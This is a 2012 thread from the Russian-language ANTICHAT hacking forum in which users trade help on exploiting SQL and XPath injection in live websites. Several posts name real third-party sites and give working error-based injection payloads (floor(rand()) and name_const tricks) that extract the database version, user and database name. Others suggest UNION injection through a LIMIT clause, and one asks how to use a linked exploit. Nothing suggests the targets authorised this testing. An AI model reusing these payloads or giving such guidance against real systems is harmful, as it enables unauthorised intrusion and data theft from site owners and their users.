ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.09.2012, 18:21
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
Сообщение от None
не подскажите,
msxml4.dll error '80004005'
A string literal was not closed.
/test3.asp, line 26
это SQL inj или просто стандартный ответ сервера на ошибочный ввод? В уязвимый параметр передаю "
это xpath inj, можно выдергивать данные из XML файлов... достаточно бесполезная уязвимость, т к вся более-менее "нужная" инфа хранится все-таки в бд....
|
|
|
09.09.2012, 18:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
142623
Репутация:
19
|
|
Сообщение от None
A string literal was not closed.
Кавычка не закрыта, где-то там.
Хотя, это смахивает на code-inj раз он интерпретирует кавычку.
|
|
|
|
10.09.2012, 08:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Не могу раскрутить. Сервер выдает:
Код:
Code:
Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT article_id, title, author, add_time, file_url, open_type, content FROM `d2okcom_gh0P72s`.`d2ok_article` WHERE is_open = 1 AND cat_id IN ('14') ORDER BY article_type DESC, add_time DESC LIMIT -10, 10 ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1 ) [3] => Array ( [errno] => 1064 ) )
С помощью union select не смог.
Скуля вида site.com/bla.php?id=[SQLI]17
А так ошибку не выдает site.com/bla.php?id=17[SQLI] |
|
|
|
10.09.2012, 09:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Подозреваю, что тут инъекция в limit.
Тыц
Попробуй id=17,10+union.....+--+ |
|
|
|
10.09.2012, 18:03
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
Сообщение от None
Warning: Cookie names can not contain any of the following '=,; \t\r\n\013\014' in /home/www/web/CAPTCHA/_init.php on line 25
только раскрытие путей?
|
|
|
|
10.09.2012, 19:15
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от DeepXhadow
DeepXhadow said:
только раскрытие путей?
Скорее всего - да.
|
|
|
|
10.09.2012, 19:45
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 0
Провел на форуме:
2833
Репутация:
0
|
|
Привет там,
Есть кто-нибудь, кто знает, как использовать этот подвиг?
http://3dwebdesign.org/forum/index.php?showtopic=1113
|
|
|
|
11.09.2012, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
http://cancer.eur[google]olab.ua/blogs/view/post/368'
Никак не могу раскрутить...ваше мнение ?
|
|
|
|
11.09.2012, 00:57
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
Always
Код:
Code:
http://cancer.eurolab.ua/blogs/view/post/368+and(select+1+from(select+count(*),concat((select+substr(concat_ws(0x3a,version(),user(),database()),1,100)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
|
|
|
|
11.09.2012, 09:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
http://www.mamashkam.ru/users/tennisvip/blog/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and(1)='1 --.html
Версию вывел, но больше ничего...
По возможности подскажите.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
